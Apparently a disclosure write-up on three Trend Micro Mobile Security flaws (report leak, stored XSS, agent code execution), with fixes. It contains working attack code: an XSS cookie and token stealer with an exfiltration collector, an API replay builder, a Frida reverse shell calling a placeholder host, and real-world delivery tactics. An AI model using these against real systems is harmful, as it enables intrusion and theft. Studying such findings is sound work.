Who Scans the Scanner? Exploiting Trend Micro Mobile Security
Abstract
Trend Micro Mobile Security (TMMS) is widely deployed to protect Android fleets. This research shows how an attacker can subvert that trust. We uncovered three vulnerabilities: (1) unauthenticated access to device security reports, exposing app inventories, scan histories, and policy status; (2) a persistent stored XSS injected via Android agent data that executes in the admin’s browser and enables session hijacking; and (3) memory-level manipulation of the Android agent’s scan routine that can be abused to run arbitrary code. We combined static reverse engineering with dynamic analysis (Frida), including SSL pinning and anti-tamper bypasses, to validate each finding and demonstrate a practical kill chain from information exposure to device compromise. Trend Micro confirmed two issues. We conclude that security tools must be scrutinized with the same rigor as any internet-facing system.
Impact TL;DR
An attacker can exploit three weaknesses to achieve a stealthy, repeatable takeover of both consoles and devices. First, unauthenticated report pages leak fleet-wide telemetry, allowing free reconnaissance to identify targets and timing. Next, device metadata that the agent forwards is rendered unescaped in those reports, so a crafted “appName” becomes stored XSS, steals an admin session, and hands the attacker the console APIs. With management-plane control, the attacker can distribute a trojanized or “support” build so that the next Scan coerces the agent’s DeviceUtil.c path into a reverse shell: code execution inside the security agent without noisy exploits.
Status: CVE request submitted to MITRE (tracking ID 1917906). IDs pending; this page will be updated when CVE(s) are reserved/assigned.
Research Motivation
We targeted TMMS because it sits at a high-leverage trust boundary in the mobile supply chain, where device agents, reporting pipelines, and the management console converge. Our goal was to test those boundaries like an adversary and map a repeatable kill chain, not chase a flashy bug. On a personal note, this work is a tribute to my mentor, Oliveira Lima, recognized in Trend Micro’s Hall of Fame. The spirit here is responsible disclosure and stronger defenses, not vendor bashing. With that intent, we combined static reverse engineering and live instrumentation to probe TMMS’s trust boundaries end-to-end. This lens mirrors APT tradecraft: compromise the trusted distribution point (here, a mobile security platform) and you inherit reach across the fleet.
Technical Introduction
As a cybersecurity researcher, I often ask: “Who scans the scanner?” Can the tools we trust for defense become our weakest links? That question drove this investigation into Trend Micro Mobile Security (TMMS), an enterprise-grade mobile security platform. Enterprises widely trust TMMS to enroll, manage, and secure employee Android devices. Because of that reach, a single flaw can have broad consequences. My motivation mixed curiosity with responsible skepticism: if attackers turn protection into a threat, what does the fallout look like?
To explore this, I scrutinized TMMS like any high-value target (both the Android device agent and the web management console), looking for weaknesses at its trust boundaries. This section sets the stage with a summary of the three vulnerabilities and their impact; the next sections dive into each one in detail.
| Vulnerability | Description | Impact |
|---|---|---|
| Unauthenticated Report Access | Security reports are publicly accessible without authentication. They expose scan histories, app inventories, OS versions, policy status, and other device data. | Confidentiality breach; enables external reconnaissance of an organization’s device fleet and security posture. |
| Persistent Stored XSS | Device-supplied fields (e.g., App Name) from the Android agent are rendered in reports without output encoding. The payload is stored server-side and executes when the report is viewed. | Admin session hijack and arbitrary actions in the console via authenticated APIs; staging point for further payloads (supply-chain pivot). |
| Memory Manipulation (Agent RCE) | During scans, the Android agent’s routine can be manipulated in memory (Frida) to alter function parameters/flow and trigger unintended behavior. | Potential code execution on the device running the agent (e.g., reverse shell/commands). Full device compromise; not confirmed by vendor. |
Each issue is severe on its own. Combined, they form an attack chain that turns a trusted security solution into an attack vector. Next, we explain how each vulnerability was discovered and how an attacker could exploit them step by step.
Scope & Testbed
Before touching a single line of code, I documented the stack under test so readers can reproduce results and so defenders can quickly judge exposure. The management console reported the following builds during the research window: “Management Server 9.8.0.3311”, “Mobile Device Agent (Android) 9.8.1.3202”, and “Agent Installation Packages 9.8.1.3202”. The anti-malware engine and patterns were updated normally via the console’s Administration -> Updates panel.
Methodology
Our research followed a structured approach, blending reverse engineering and dynamic analysis techniques to peel back TMMS’s layers of defense. The process began with reconnaissance: we examined the TMMS web console for exposed endpoints and publicly accessible pages. This initial passive analysis led to the discovery of an unauthenticated report page, hinting at a larger security gap (Vulnerability 1). Next, we moved to reverse engineering the Android application (APK). Using tools like Jadx and ApkTool, we decompiled the TMMS enterprise agent to study its code, focusing on components handling device data and scanning routines.
Dynamic analysis was conducted in a controlled environment with an instrumented Android device. We employed Frida, a dynamic instrumentation toolkit, to hook into the running TMMS agent process. This allowed us to intercept and modify function calls at runtime. Early on, we encountered client-side defenses. TMMS employs SSL/TLS certificate pinning and runtime hardening (specifically anti-tamper). In our lab environment, we bypassed pinning by dynamically hooking the verification path (so the agent would accept our proxy certificate) and, where needed, applied smali-level static patches. This allowed us to observe agent-to-server HTTPS requests. We also neutralized tamper checks so the app would run on a modified APK. These steps were limited to analysis and did not constitute part of the exploitation chain. These bypasses of client-side controls, SSL pinning, and anti-tamper protections were crucial for a full dynamic analysis.
With those obstacles removed, we instrumented the agent and traced the agent requests to the console page. After, we confirmed that device-supplied metadata (appName) is persisted server-side and later rendered without proper output encoding. We then enrolled a test device and changed the parameter value to an application whose name yielded a persistent stored XSS (Vulnerability 2). In our controlled PoC, the payload could read the admin session and invoke authenticated console APIs. Because these reports are served under the same unauthenticated paths highlighted in Vulnerability 1, the trigger bar is extremely low. In parallel, by modifying in-memory parameters during the scan routine, we demonstrated a memory-level manipulation path in the Android agent (Vulnerability 3). Throughout the study, we iterated between static analysis and live instrumentation. This hybrid approach (from initial recon to reverse engineering to runtime manipulation) surfaced all three vulnerabilities. The sections below detail each finding, the challenges encountered, and the evidence gathered.
Bypassing Client-Side Controls: SSL Pinning and Signature Check
Before we dive into the vulnerabilities, we need to talk about client-side controls. Out of the box, the TMMS Android agent is intentionally opaque: TLS pinning prevents traffic inspection, and a self-signature check kills the process as soon as the APK has been modified. To study the reporting pipeline, fuzz scan flows, and demonstrate impact end-to-end, I first peeled those layers back strictly with binary patching, decompiling to smali, changing tiny decision points, rebuilding, and re-signing a lab build. This gives a stable, repeatable test artifact that survives process restarts, recording sessions, and long runs.
I began with the self-integrity gate. Static analysis in JADX led to “com.trendmicro.tmmssuite.enterprise.util.Utils”, where a compact routine reads the app’s signing certificate via PackageManager, normalizes the fingerprint, and compares it to a hard-coded value. In the lab build, I replaced the comparison branch with a constant boolean. Functionally, it reduces to: return true, always. The rest of the startup proceeds unmodified, which preserves the agent’s behavior while allowing an instrumented, re-signed APK to run.
Right below it, I added a single-line patch to the companion method to short-circuit the check. After rebuilding and re-signing, the agent no longer exits when it detects my test key, perfect for controlled analysis without changing feature code.
With the anti-tamper barrier out of the way, I addressed TLS pinning purely in the binary. Under the Trend Micro namespaces, multiple components participate in TLS decisions, “HostnameVerifier#verify, X509TrustManager#checkServerTrusted / #checkClientTrusted”, and related paths (including Wi-Fi security and HTTP executors). Each of those tiny guards was modified at the smali level to accept my lab CA and to return without throwing. After a clean rebuild, the agent spoke HTTPS through my proxy while remaining functionally identical from the UI’s point of view.
It’s worth noting that TMMS performs other posture checks besides pinning and self-signature: root detection, USB debugging, Developer Options, mock locations, and emulator heuristics. In the default policy, they raise warnings rather than hard-block execution, but they can still affect compliance or gate features. The same binary-patching approach applies: find the small helpers that compute those booleans and replace them with constant returns for a reproducible laboratory build. With a minimal understanding of the call graph, these controls can be neutralized as predictably as the signature and TLS checks above, strictly for analysis, never for production use.
With these client-side gates safely relaxed in a test build, traffic became observable, the agent stayed stable across restarts, and I could capture the exact requests sent during scans, mutate device-supplied fields, and validate the exploit chain you’ll see next. Everything that follows (the report leakage, the stored XSS, and the scan-time code execution) sits on top of this foundation of precise, minimal binary patches crafted to study the client without altering its higher-level logic.
Vulnerability 1: Unauthenticated Access to Security Reports
I began with a legitimate admin session to understand how reporting worked. From the Report Management page at “/mdm/web/notificationReports/report.htm”, the console lets me generate on-demand reports and view their results. While mapping that flow, I noticed that the “View” actions resolved to static HTML artifacts under “/mdm/web/repository/report/manual/output/”.
At this point, I dropped my session, switched to a clean browser profile (no cookies), and requested those same URLs directly. They loaded without any authentication challenge. In other words, the report outputs themselves were published as static files outside the normal session checks. The effect is public read-access to administrator-grade telemetry about the fleet. These report outputs render dashboard charts (e.g., bar and pie charts) such as Top 10 Installed Applications, Top 10 Blocked Websites, and platform-specific scan and compliance summaries. Because the artifacts are served as static HTML, these charts load without an authenticated session and preserve drill-down links, which significantly increases the reconnaissance value of the leak.
Below are representative outputs and the kind of information each one exposes:
| Report URL (static output) | Examples of exposed content |
|---|---|
| /mdm/web/repository/report/manual/output/Security_Scan_Report.htm | Android Application Scan Summary, iOS Application Scan Summary, Android Network Protection Summary, iOS Network Protection Summary, Android/iOS Device Vulnerability Summary, Top 10 Blocked Websites. |
| /mdm/web/repository/report/manual/output/Devices_Inventory_Report.htm | Device Groups, Device Statuses, Health, Policy Update, Application Control, Encryption, iOS Jailbreaking and Android Rooting, Device Registration Status, Operating System Summary, Android Versions, iOS Versions, Vendors, Telecommunications Carriers, Inactivity Reasons. |
| /mdm/web/repository/report/manual/output/Compliance_Violation_Report.htm | Groupings of non-compliant devices by policy failures (root/jailbreak, control/agent posture, encryption, etc.). |
| /mdm/web/repository/report/manual/output/Devices_Enrollment_Report.htm | Enrollment timeline and distribution across groups and platforms, indicating where and when devices enter the fleet. |
| /mdm/web/repository/report/manual/output/Application_Inventory_Report.htm | Top 10 Installed Applications (Android/iOS), often including internal app names and versions tied to specific business units. |
| /mdm/web/repository/report/manual/output/Devices_Unenrollment_Report.htm | Unenrollment events with timestamps and reasons, which can reveal off-boarding patterns. |
From an attacker’s perspective, this is turnkey reconnaissance: by pivoting across those pages, an unauthenticated visitor can reconstruct OS coverage and lag, policy posture and failures, app inventories, recent detections, and enrollment/unenrollment dynamics (enough to profile high-value users and plan precision attacks).
The root cause is architectural rather than a single broken check. The web tier serves report artifacts as static HTML behind generic routing, effectively without application-level authorization. The management UI acts as a thin convenience layer; once a URL is known (or guessed), fetching the artifact is just an unauthenticated GET. We validated this repeatedly in an incognito profile and across multiple report types.
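Because the artifacts are plain static files, verifying the exposure reduces to one unauthenticated GET per path. The sketch below (Python) enumerates the report paths from the table above and probes each one with no cookies or auth headers; the console hostname is a placeholder, and this is a reproduction aid, not part of the original toolchain.

```python
from urllib.parse import urljoin
import urllib.request

# Static report artifacts observed during the research
# (paths taken from the table above).
REPORT_PATHS = [
    "/mdm/web/repository/report/manual/output/Security_Scan_Report.htm",
    "/mdm/web/repository/report/manual/output/Devices_Inventory_Report.htm",
    "/mdm/web/repository/report/manual/output/Compliance_Violation_Report.htm",
    "/mdm/web/repository/report/manual/output/Devices_Enrollment_Report.htm",
    "/mdm/web/repository/report/manual/output/Application_Inventory_Report.htm",
    "/mdm/web/repository/report/manual/output/Devices_Unenrollment_Report.htm",
]

def candidate_report_urls(base_url: str) -> list:
    """Expand a console base URL into the static report artifact URLs."""
    return [urljoin(base_url, path) for path in REPORT_PATHS]

def probe(url: str, timeout: float = 5.0) -> int:
    """Fetch a report URL with no cookies or auth headers and return the
    HTTP status. A 200 here confirms the artifact bypasses session checks."""
    req = urllib.request.Request(url, headers={"User-Agent": "recon-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status

if __name__ == "__main__":
    # Placeholder hostname; substitute the console under test in a lab.
    for url in candidate_report_urls("https://console.example.internal"):
        print(url)
```

A clean (incognito-equivalent) client returning 200 on any of these paths reproduces the finding.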
Critically, the exposure is not just a confidentiality failure; it sets up the trigger for Vulnerability 2. The same report pages render device-originated fields (the parameter “appName” collected by the agent) and, because that content is stored server-side and returned without output encoding, a string like ><script>…</script> remains intact and executes on view. In our PoC, simply opening the report in an administrator’s browser fired the payload, yielding a persistent stored XSS (Vulnerability 2) and turning the leaked report into a delivery surface for code execution.
We reported the issue to the vendor. Regardless of whether the console is internet-exposed or “internal only,” publishing report artifacts outside the authentication flow breaks the basic trust model of a security dashboard. The fix is straightforward in principle (enforce authorization on the output paths or serve reports through authenticated controllers only), with short-lived, hard-to-guess URLs at minimum, but until that control exists, the page designed to help defenders becomes an intelligence feed for adversaries.
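In code terms, the principle of that fix is small. The stand-in below is stdlib Python, not the console’s actual stack; the session store is illustrative and the cookie name TMMStoken is borrowed from the console traffic observed later in this research. It gates the artifact behind a session check instead of a generic static route.

```python
from http import HTTPStatus
from http.cookies import SimpleCookie

# Hypothetical session store; the real console would validate against
# its own session backend.
VALID_SESSIONS = {"3f9c2a"}  # illustrative token only

def is_authorized(headers: dict) -> bool:
    """Return True only if the request carries a valid session cookie.
    Report artifacts should never be served when this check fails."""
    cookie = SimpleCookie(headers.get("Cookie", ""))
    token = cookie.get("TMMStoken")
    return token is not None and token.value in VALID_SESSIONS

def serve_report(headers: dict, artifact_bytes: bytes):
    """Gate the static artifact behind the session check rather than
    publishing it under generic static routing."""
    if not is_authorized(headers):
        return HTTPStatus.UNAUTHORIZED, b""
    return HTTPStatus.OK, artifact_bytes
```

The same check belongs on every output path, including any download or drill-down links embedded in the generated HTML.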
Vulnerability 2: Persistent Stored XSS via the Android Agent
After bypassing TLS pinning to observe traffic, we watched the Android agent enumerate installed applications. Once the data flow was mapped, the next step was to see whether any device-supplied fields were later rendered by the console. During a regular Device Sync, the Android agent posts its application inventory to the server at:
POST /officescan/PLS_TMMS_CGI/cgiosmaUpload.dll
Content-Type: application/json
Inside the body, the application list is carried under “UpdateAppInformationRequest.Add[]”. We modified the field path “UpdateAppInformationRequest.Add[i].AppName” to include a benign script token and let the device sync normally:
{
"UpdateAppInformationRequest": {
"Add": [
{
"PackageName": "io.hakaisecondary.beerus",
"AppName": "><script></script>",
"Version": "1.0.0"
}
]
}
}
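To make the seeding step repeatable, the tampering can be scripted against a captured Device Sync body instead of edited by hand in a proxy. A minimal Python sketch follows; the endpoint path and field path come from the capture above, while how the body is intercepted is left to your proxy tooling of choice.

```python
import json

# Ingest endpoint observed during Device Sync (from the capture above).
INGEST_PATH = "/officescan/PLS_TMMS_CGI/cgiosmaUpload.dll"

def poison_app_name(sync_body: str, payload: str) -> str:
    """Rewrite every AppName in a captured Device Sync body.
    Walks UpdateAppInformationRequest.Add[i].AppName, matching the
    JSON structure shown above."""
    doc = json.loads(sync_body)
    for entry in doc["UpdateAppInformationRequest"]["Add"]:
        entry["AppName"] = payload
    return json.dumps(doc)

if __name__ == "__main__":
    original = json.dumps({
        "UpdateAppInformationRequest": {
            "Add": [{
                "PackageName": "io.hakaisecondary.beerus",
                "AppName": "Beerus",
                "Version": "1.0.0",
            }]
        }
    })
    print(poison_app_name(original, "><script></script>"))
```

The rewritten body is then forwarded unchanged to the ingest endpoint, and the device sync completes normally.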
To confirm persistence, I opened Devices -> Devices Management and drilled into the test handset. The Installed Applications grid reflected the tampered names exactly as reported by the device, proving the value had been written to the management datastore and was reachable by the web tier. Some console views displayed the raw tag characters as text; the important observation is that the string survived transit unchanged and would later be reused in reporting templates.
GET /mdm/web/devices/DevicesManagement.htm
The real break happened in the Reports workflow. On the report page located at “/mdm/web/notificationReports/report.htm” I generated the Application Inventory Report. TMMS wrote the output to the static repository path
“/mdm/web/repository/report/manual/output/Application_Inventory_Report.htm”. This report template renders the application name field directly into the page without output encoding, and, compounding Vulnerability 1, the report URLs were accessible without authentication.
GET /mdm/web/notificationReports/report.htm
Opening the generated report executes the stored payload in the browser context. The proof is the modal alert sourced from the console’s IP while the page path is “…/Application_Inventory_Report.htm”. Because the JavaScript runs in the user’s origin, it can read the session, call internal console APIs, and import additional scripts, turning a device-originated metadata field into console-side code execution. With the report endpoint exposed publicly (Vulnerability 1), even non-authenticated visitors can be led to the trigger page.
GET /mdm/web/repository/report/manual/output/Application_Inventory_Report.htm
executes the stored script immediately, proof that the server stores device data and returns it without output encoding in a page that’s also unauthenticated (see Vulnerability 1). As soon as a user (especially an admin) views the report, the payload runs in their browser context, yielding a persistent stored XSS.
Because the XSS is stored server-side and the report endpoints are publicly reachable, the trigger threshold is extremely low. In our PoC, simply opening the report executed attacker-controlled JavaScript, which can read the active admin session and invoke authenticated console APIs (e.g., pushing configurations, creating a rogue admin, or pulling additional device data), or bootstrap further payloads from a controlled origin.
| Stage | Endpoint | Entrypoint |
|---|---|---|
| Agent -> Server (ingest) | POST /officescan/PLS_TMMS_CGI/cgiosmaUpload.dll | UpdateAppInformationRequest.Add[].AppName |
| Server -> Console (UI render) | GET /mdm/web/devices/DevicesManagement.htm | AppName |
| Server -> Report (static render) | GET /mdm/web/repository/report/manual/output/Application_Inventory_Report.htm | AppName |
In sum, the ingest–render–report path turns a routine inventory field into code that runs in a user’s browser on view. Because the report artifacts reside under the unauthenticated “/mdm/web/repository/report/manual/output/” tree, viewing is the only trigger; no special click or crafted URL parameters are required. Once executed, the script inherits the user’s ambient session and can read state or invoke console APIs to create users, push policies, or stage secondary payloads.
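The missing render-side control is ordinary output encoding. As a short illustration (Python’s html.escape standing in for whatever encoding primitive the console’s templating layer provides), encoding at render time leaves the stored value untouched in the datastore but inert in the page:

```python
import html

# The value persisted by the tampered Device Sync shown earlier.
stored_app_name = "><script></script>"

# Rendered raw, the browser parses the tag; encoded, it is plain text.
encoded = html.escape(stored_app_name, quote=True)
print(encoded)  # &gt;&lt;script&gt;&lt;/script&gt;
assert "<script>" not in encoded
```

Applying this at every sink that renders device-supplied fields (device grids and report templates alike) closes the ingest-to-render path regardless of what the agent sends.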
From Stored XSS to Console Takeover
The stored payload isn’t the goal, it’s the transport. After proving that device-supplied metadata is rendered verbatim in the Application Inventory Report and related views, I weaponized the same field to load a hosted script and pivot from “proof” to “post-exploitation”. The seeding step happens on the device -> server ingestion path: the Android agent forwards app metadata to “/officescan/PLS_TMMS_CGI/cgiosmaUpload.dll”. By setting the application name to an HTML <script> tag that points at my server (e.g., https://IP-ADDRESS/luriel_v2.js), the console later includes that script when a user opens the report. Nothing exotic, just using the product’s own pipeline as the loader.
Once the report is viewed, the browser executes my script with the admin’s origin and session. The script does three things in sequence. First, it harvests state the console already holds: document.cookie to recover the TMMStoken, and localStorage.wf_CSRF_token when present. That value is the console’s CSRF nonce persisted by the UI; some POST endpoints require it alongside the session cookie, so capturing it lets the script forge same-site requests that survive server-side CSRF validation. If the token isn’t set for a given view, the script falls back to cookie-only calls that the console still accepts. Second, it proves reach and privilege by invoking a JSON endpoint: the console uses “/mdm/cgi/web_service.dll” with a well-formed body (tmms_action: “get_authentication_method”) and the same headers the app sends (Content-Type: application/json, X-Requested-With: XMLHttpRequest, X-Tmmstoken: <token>). Third, it exfiltrates everything to my HTTPS listener as JSON. Because modern browsers preflight cross-origin POSTs, my listener implements CORS for OPTIONS and mirrors permissive “Access-Control-Allow-*” headers, so the POST succeeds without tripping the browser.
The companion Python server is a tiny TLS endpoint that listens on 443 and accepts the browser’s CORS preflight; its OPTIONS handler returns permissive “Access-Control-Allow-*” headers so the POST from the injected script isn’t blocked. The POST path “/log” reads the request body using the announced “Content-Length”, then attempts to JSON-decode it; if parsing fails, it dumps the raw UTF-8 so nothing is lost. Running under HTTPS with a self-signed cert.pem/key.pem avoids mixed-content errors in modern browsers and keeps credential material off cleartext. Every payload (cookies, CSRF token, and any API response blob) is echoed to stdout for live triage and can be redirected to disk or a database for replay. In short, the JS turns the admin’s browser into a courier, and the Python service acts as the CORS-friendly collector that receives, normalizes, and safely stores what the browser delivers.
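A collector matching that description can be reconstructed in a few dozen lines of stdlib Python. The sketch below is an illustrative reimplementation, not the exact PoC script; cert.pem/key.pem are the self-signed lab materials mentioned above, and serve() is left uncalled so the wiring is visible without blocking.

```python
import json
import ssl
from http.server import BaseHTTPRequestHandler, HTTPServer

def parse_body(raw: bytes):
    """JSON-decode an exfil body; fall back to raw UTF-8 so nothing is lost."""
    try:
        return json.loads(raw)
    except (ValueError, UnicodeDecodeError):
        return raw.decode("utf-8", errors="replace")

class Collector(BaseHTTPRequestHandler):
    def _cors(self):
        # Permissive CORS so the browser's preflight and the cross-origin
        # POST from the injected script both succeed.
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Access-Control-Allow-Methods", "POST, OPTIONS")
        self.send_header("Access-Control-Allow-Headers", "*")

    def do_OPTIONS(self):
        # Answer the CORS preflight with 204 and permissive headers.
        self.send_response(204)
        self._cors()
        self.end_headers()

    def do_POST(self):
        # Read exactly Content-Length bytes, then decode or dump raw.
        length = int(self.headers.get("Content-Length", 0))
        print(parse_body(self.rfile.read(length)))  # live triage on stdout
        self.send_response(200)
        self._cors()
        self.end_headers()

def serve(cert="cert.pem", key="key.pem", port=443):
    """Wrap the listener in TLS with the self-signed lab cert and block."""
    srv = HTTPServer(("0.0.0.0", port), Collector)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert, key)
    srv.socket = ctx.wrap_socket(srv.socket, server_side=True)
    srv.serve_forever()
```

Running serve() in the lab gives the HTTPS /log-style sink the injected script posts to; stdout can be redirected to disk for replay.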
With that in place, opening Application_Inventory_Report.htm converts a benign dashboard click into a controlled data pump. The first wave delivers cookies, CSRF token, and the response blob from the authenticated API call, exactly the materials needed to replay API actions or mint operator-grade requests from outside the console. In my capture, the exfil contained “session_info”, the admin userID, the current deploy_mode, and a “preset_enroll_key” (where configured), alongside the success response from “get_authentication_method”. From there, an attacker can step up to session hijack (cookie replay), authenticated API abuse (policy changes, package distribution), or quiet reconnaissance (enumerating devices and groups) without ever touching the login page.
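Once the cookie and CSRF material are in hand, operator-grade requests can be minted from entirely outside the console. The sketch below assembles such a replay in Python; the header names and tmms_action value mirror the traffic described above, while the exact cookie string format on the wire is an assumption for illustration.

```python
import json

# Console JSON endpoint used by the UI (from the traffic above).
API_PATH = "/mdm/cgi/web_service.dll"

def build_replay_request(token: str, session_cookie: str):
    """Assemble headers and body to replay an authenticated console API
    call. X-Tmmstoken and tmms_action mirror what the UI itself sends;
    the Cookie format is an assumption for illustration."""
    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "X-Tmmstoken": token,
        "Cookie": f"TMMStoken={session_cookie}",
    }
    body = json.dumps({"tmms_action": "get_authentication_method"}).encode()
    return headers, body

if __name__ == "__main__":
    hdrs, body = build_replay_request("stolen-token", "stolen-cookie")
    print(hdrs["X-Tmmstoken"], body)
```

Pair the assembled headers and body with any HTTP client pointed at API_PATH on the console, and the server treats the request as the hijacked admin session.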
Vulnerability 3: Memory Manipulation Leading to Remote Code Execution
The third finding began with a simple heuristic during reverse engineering: anything in the Android agent that spawns an OS process as part of normal posture checks is a natural pivot. In “com.trendmicro.android.base.util.DeviceUtil” I found a method named “c()” that probes for rooting by executing “which su”. Tracing the app while starting a Security Scan showed this method on the hot path; it is invoked during posture evaluation on ordinary user flows, which makes it both reachable and predictable.
// package: com.trendmicro.android.base.util
// class: DeviceUtil
// note: called during posture/scan paths
private static boolean c() {
Process process = null;
try {
process = Runtime.getRuntime().exec(new String[]{"/system/xbin/which", "su"});
boolean present =
new BufferedReader(new InputStreamReader(process.getInputStream()))
.readLine() != null;
if (process != null) process.destroy();
return present;
} catch (Throwable unused) {
if (process != null) process.destroy();
return false;
}
}
Now that the code path is clear in “DeviceUtil”, let’s move to exploitation. For the demonstration, I wrote a Frida script that hooks the “c(android.content.Context)” overload and instruments it at runtime, dynamically replacing its expected behavior with values under my control. Instead of merely probing for “su”, the hook spawns “/system/bin/sh”, opens a TCP socket to my listener, and bridges the shell’s I/O, then returns a “java.lang.String” so the scan flow continues uninterrupted. Let’s see how it’s done.
const Socket = Java.use('java.net.Socket');
const OutputStream = Java.use('java.io.OutputStream');
const InputStream = Java.use('java.io.InputStream');
const ProcessBuilder = Java.use('java.lang.ProcessBuilder');
const StringBuilder = Java.use('java.lang.StringBuilder');
const Thread = Java.use('java.lang.Thread');
const ArrayList = Java.use('java.util.ArrayList');
// Change these to match your netcat listener
const host = 'IP-ADDRESS'; // Replace with your IP address
const port = PORT; // Replace with your port number
var DeviceUtil = Java.use('com.trendmicro.android.base.util.DeviceUtil');
// Specify the overload with Context parameter
var c_overload = DeviceUtil.c.overload('android.content.Context');
c_overload.implementation = function(context) {
console.log("[*] DeviceUtil.c(Context) called with context: " + context);
// Start the reverse shell
try {
var arr = Java.array('java.lang.String', ['/system/bin/sh']);
var p = ProcessBuilder.$new.overload('[Ljava.lang.String;')
.call(ProcessBuilder, arr)
.redirectErrorStream(true)
.start();
var s = Socket.$new.overload('java.lang.String', 'int').call(Socket, host, port);
var pi = p.getInputStream();
var pe = p.getErrorStream();
var si = s.getInputStream();
var po = p.getOutputStream();
var so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) {
so.write(pi.read());
}
while (pe.available() > 0) {
so.write(pe.read());
}
while (si.available() > 0) {
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (e) {
// ignore
}
}
p.destroy();
s.close();
// Return a Java string as expected by the original method
return Java.use('java.lang.String').$new("Command Executed");
} catch (e) {
console.log("[*] Error: " + e.message);
// Return an error string as expected by the original method
return Java.use('java.lang.String').$new("Command Execution Failed");
}
};
The hook you see in the above code replaces the c(android.content.Context) overload at runtime. The script begins by binding the agent’s own Java classes so every call is resolved in the correct class loader: “java.net.Socket” for the TCP connection, “java.io.InputStream” and “java.io.OutputStream” for byte movement, “java.lang.ProcessBuilder” to launch a child process, “java.lang.StringBuilder” for incidental buffers, “java.lang.Thread” for a tiny yield, and “java.util.ArrayList” because the original PoC imported it alongside the others. It then requests the exact signature “DeviceUtil.c(‘android.content.Context’)”, so the replacement matches the original ABI and return type.
The implementation opens with a log line that includes the concrete “Context” instance and immediately constructs a real Java “String[]” using “Java.array(‘java.lang.String’, [‘/system/bin/sh’])”. That conversion really matters; ART will not accept a JavaScript array in place of “[Ljava.lang.String;”. With the array in hand, the code calls the “ProcessBuilder(String[])” constructor via Frida’s overload resolver, sets “redirectErrorStream(true)” so stderr is folded into stdout, and launches the process with “start()”. At that moment “/system/bin/sh” is running inside the agent’s process, under the agent’s UID, with the agent’s network and filesystem privileges.
A TCP client socket is then created with the two-argument constructor “Socket(String host, int port)”. Our PoC uses a private lab address and port; the object model is the same regardless of target. With the shell process alive and the socket connected, the script captures five streams: from the child process it takes stdout via “getInputStream()” and stderr via “getErrorStream()”, and it keeps a writable handle to stdin via “getOutputStream()”; from the socket it reads with “getInputStream()” and writes with “getOutputStream()”. These are the only moving parts required to form a bidirectional bridge between the shell and the operator.
The bridge loop is single-threaded and minimalist by design. It tests “available()” on each input stream to avoid blocking, drains whatever bytes are present from the shell’s stdout and stderr into the socket’s output, and drains whatever bytes arrive from the socket into the shell’s stdin. It flushes both sides so keystrokes and responses feel interactive rather than buffered. A short “Thread.sleep(50)” yields to the scheduler so the hook doesn’t spin at 100% CPU, and a probe of “p.exitValue()” provides a clean exit; that call throws while the child is alive and only returns once the shell has terminated. When either side closes, the script destroys the child and closes the socket explicitly to avoid leaking descriptors across subsequent scans. The last line returns a real “java.lang.String” (for example, Command Executed), so the caller’s contract is satisfied, and the UI continues into the result panel without complaint. If any exception bubbles up, an error message is logged, and another “java.lang.String” is returned to preserve type safety.
When the scan runs, the effect is immediate and quiet. The moment the posture phase hits “c(Context)”, the listener receives an interactive session from the device. Shell commands resolve inside the TMMS agent’s sandbox, while on screen “Security Scan Result” renders as usual. That duality (a normal UI on the device, a live shell under the app’s UID at the operator’s end) is the point of the technique: coercion of a legitimate process spawn on a routine path rather than a crash-and-burn exploit.
Make sure the TCP listener is already running before triggering a Scan. The hook dials out from the device to the host:port you set in the script and immediately bridges the socket to “/system/bin/sh”. With the listener up (nc -lvnp 1337), the connection is accepted, and you can type commands at the listener; they’re written to the shell’s stdin, and the shell’s stdout/stderr are streamed back to you. If the listener isn’t running (or you close it), the socket breaks, the bridge loop tears down, and the method returns to the app.
Below is a short demo video of the exploit running against the app’s Scan feature. As the scan kicks off, the Frida hook on “DeviceUtil.c(Context)” fires, spawns “/system/bin/sh”, and the reverse shell connects back to my listener, while the UI proceeds as if nothing unusual happened.
Beyond the lab hook, the natural question is: how would a real adversary light this up without Frida on a tethered device? The most direct path is a trojanized TMMS build (repacked with a Frida Gadget or lightweight loader) shipped as a “routine security update” through side-loading channels common in enterprise fleets. A close second is abusing the management plane: leverage the stored-XSS console compromise to steal an admin session, then use the console’s software-distribution or policy features to push a modified agent or auxiliary “support” APK that auto-triggers during scans. On devices already under partial control (stolen, jailbroken/rooted test phones, or handsets with developer options enabled), an operator can load Magisk/Xposed/LSPosed modules or a small native library shim to inject the same hook at boot, without requiring user taps. Supply-chain angles also exist: seed a tainted agent into pre-enrollment images, vendor app catalogs, or internal EMM stores, so the payload arrives with corporate branding and expected signatures. If the agent exposes exported services or broadcast receivers, or uses dynamic class loading (DexClassLoader), those surfaces should be reviewed as potential code-loading pivots that can be driven by a companion app rather than on-device tooling.
Full Impact Analysis
Up to this point, we walked through how the console leaks intelligence (Vulnerability 1), how device-supplied metadata poisons the UI (Vulnerability 2), and how a scan-time helper can be coerced into a shell (Vulnerability 3). The impact is best understood as a single operator’s storyline: how an APT or a disciplined red team would chain these seams into a durable, low-noise foothold.
It starts with reconnaissance, not exploitation. The unauthenticated report endpoints under “/mdm/web/repository/report/manual/output/”, for example “Security_Scan_Report.htm”, “Devices_Inventory_Report.htm”, and “Application_Inventory_Report.htm”, generated from “/mdm/web/notificationReports/report.htm”, expose fleet-level telemetry with no session. That data includes “Top-10” dashboard data: OS versions, app inventories, compliance state, last scan times, and carrier information. For an adversary, this is free target selection: pick high-value groups, map patch gaps, learn which devices run sensitive apps, and time the next move to the organization’s scan cadence.
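The reconnaissance step needs nothing more than a URL list and an unauthenticated GET. A minimal sketch, assuming a hypothetical console origin (“tmms.example.com”); it builds the candidate report URLs and checks whether they answer with no session attached:

```python
import urllib.request
from urllib.parse import urljoin

REPORT_BASE = "/mdm/web/repository/report/manual/output/"
REPORT_NAMES = [
    "Security_Scan_Report.htm",
    "Devices_Inventory_Report.htm",
    "Application_Inventory_Report.htm",
]

def report_urls(console: str) -> list[str]:
    """Candidate unauthenticated report URLs for a given console origin."""
    return [urljoin(console, REPORT_BASE + name) for name in REPORT_NAMES]

def answers_without_session(url: str) -> bool:
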